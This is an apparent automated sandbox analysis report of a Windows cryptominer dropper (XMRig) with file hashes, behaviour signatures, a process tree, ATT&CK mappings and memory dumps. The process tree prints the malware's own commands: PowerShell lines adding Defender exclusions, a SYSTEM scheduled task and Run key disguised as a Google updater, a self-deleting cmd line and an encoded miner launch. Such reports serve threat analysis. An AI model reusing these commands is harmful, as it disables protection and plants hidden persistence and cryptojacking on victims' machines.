Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1775s
  • max time network
    1803s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/M8xUNW42QxTLMRXN.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 24 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1180
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1916
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2420
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\M8xUNW42QxTLMRXN.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2796
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1032
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1860
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1196
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:2480
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            3⤵
            • Detects videocard installed
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2564
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:2816
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2588
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {3C808B7A-C9EB-446F-A3FE-92A79F7CF81C} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:696

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          41KB

          MD5

          bbf773378a9b409fce34916985c43903

          SHA1

          c759eeb4f3ccc001cca137dc41b485c346af0f42

          SHA256

          9dc91ad771902dabeb37cf0da9ab3745244c4d05a6e2c0ed4ae07dedd29dacb6

          SHA512

          41241ede8df973177295f581c1504e73de19e31c0a2ea27971852ce91605d0f3a170eb32bba17d683d9873e69583abb37f6aee1e964fcc57cff9789501bdfac4

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          231KB

          MD5

          d15c5250ea3a0779166cb28e6ea5c799

          SHA1

          504814d6fa3fccf994a1549fde95d93e875e7278

          SHA256

          dfde379e9958c7a6dfd8f96bca37993e2466245bb2b090b668772151aac0c1fa

          SHA512

          db979d1c2df613f885beff6c383a582d6d5298a2a6cdb46912ee08028c17cba116d9ecd168f7c00cdc2aa7aa39451400ea653b45e14a500f12674a19f9d168f9

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IYD7VQ0S2QJ1DQJ1RDVQ.temp
          Filesize

          7KB

          MD5

          9ffb98873a85352affbe24d8bb991db6

          SHA1

          9a8a569b2f4ff1b56dfda454ded0926efc1d75d2

          SHA256

          3a1b413a372c40f8b343a1972329cb1b35fbba11be9c180a0c5f71fcc991c0af

          SHA512

          362ea62212099072cd9230dad4bc46ba62346e01a3780f0802e7631a36f120463ce5a8a81969f820dd0e5e0810768bad9c2487acd3c64919b1eb56b70457b8aa

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          1KB

          MD5

          354cb1a947775335559af96169bec9b7

          SHA1

          b6c8f30617d94fb12296d9591778f67d4d81371e

          SHA256

          a3f75e9da7020010715b3577eeb734c992639c52d28022dcf4351e75b547ad9a

          SHA512

          7b31080399d8c37de51ea26b50abba6e475d1bde589061bcfe54f98453843c44686cbc9540409b28a6ec1b4076e94a068d96af197c7a76b7574b67cb02be671b

        • memory/488-45-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/488-46-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/488-48-0x0000000000A30000-0x0000000000AB0000-memory.dmp
          Filesize

          512KB

        • memory/488-49-0x0000000000A30000-0x0000000000AB0000-memory.dmp
          Filesize

          512KB

        • memory/488-47-0x0000000000A30000-0x0000000000AB0000-memory.dmp
          Filesize

          512KB

        • memory/488-50-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/696-65-0x000000013FD70000-0x000000013FF81000-memory.dmp
          Filesize

          2.1MB

        • memory/696-44-0x000000013FD70000-0x000000013FF81000-memory.dmp
          Filesize

          2.1MB

        • memory/1032-58-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/1032-52-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/1032-53-0x0000000001070000-0x00000000010F0000-memory.dmp
          Filesize

          512KB

        • memory/1032-54-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/1032-56-0x0000000001070000-0x00000000010F0000-memory.dmp
          Filesize

          512KB

        • memory/1032-55-0x0000000001070000-0x00000000010F0000-memory.dmp
          Filesize

          512KB

        • memory/1032-57-0x0000000001070000-0x00000000010F0000-memory.dmp
          Filesize

          512KB

        • memory/1916-27-0x000000013FFE0000-0x00000001401F1000-memory.dmp
          Filesize

          2.1MB

        • memory/1916-0-0x000000013FFE0000-0x00000001401F1000-memory.dmp
          Filesize

          2.1MB

        • memory/2084-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-67-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-66-0x00000000000F0000-0x0000000000110000-memory.dmp
          Filesize

          128KB

        • memory/2084-68-0x00000000007A0000-0x00000000007C0000-memory.dmp
          Filesize

          128KB

        • memory/2084-69-0x00000000007C0000-0x00000000007E0000-memory.dmp
          Filesize

          128KB

        • memory/2084-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2084-78-0x00000000007A0000-0x00000000007C0000-memory.dmp
          Filesize

          128KB

        • memory/2084-79-0x00000000007C0000-0x00000000007E0000-memory.dmp
          Filesize

          128KB

        • memory/2084-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2432-8-0x00000000023D0000-0x00000000023D8000-memory.dmp
          Filesize

          32KB

        • memory/2432-12-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2432-7-0x0000000002640000-0x00000000026C0000-memory.dmp
          Filesize

          512KB

        • memory/2432-6-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2432-5-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
          Filesize

          2.9MB

        • memory/2432-9-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2432-10-0x0000000002640000-0x00000000026C0000-memory.dmp
          Filesize

          512KB

        • memory/2432-11-0x0000000002640000-0x00000000026C0000-memory.dmp
          Filesize

          512KB

        • memory/2580-34-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2580-39-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2580-38-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2580-40-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2580-37-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2580-36-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp
          Filesize

          9.6MB

        • memory/2580-35-0x0000000002860000-0x00000000028E0000-memory.dmp
          Filesize

          512KB

        • memory/2648-21-0x0000000002530000-0x00000000025B0000-memory.dmp
          Filesize

          512KB

        • memory/2648-24-0x0000000002530000-0x00000000025B0000-memory.dmp
          Filesize

          512KB

        • memory/2648-23-0x0000000002530000-0x00000000025B0000-memory.dmp
          Filesize

          512KB

        • memory/2648-25-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/2648-22-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/2648-19-0x000007FEF49B0000-0x000007FEF534D000-memory.dmp
          Filesize

          9.6MB

        • memory/2648-20-0x0000000002510000-0x0000000002518000-memory.dmp
          Filesize

          32KB

        • memory/2648-18-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
          Filesize

          2.9MB

        • memory/2816-74-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2816-70-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB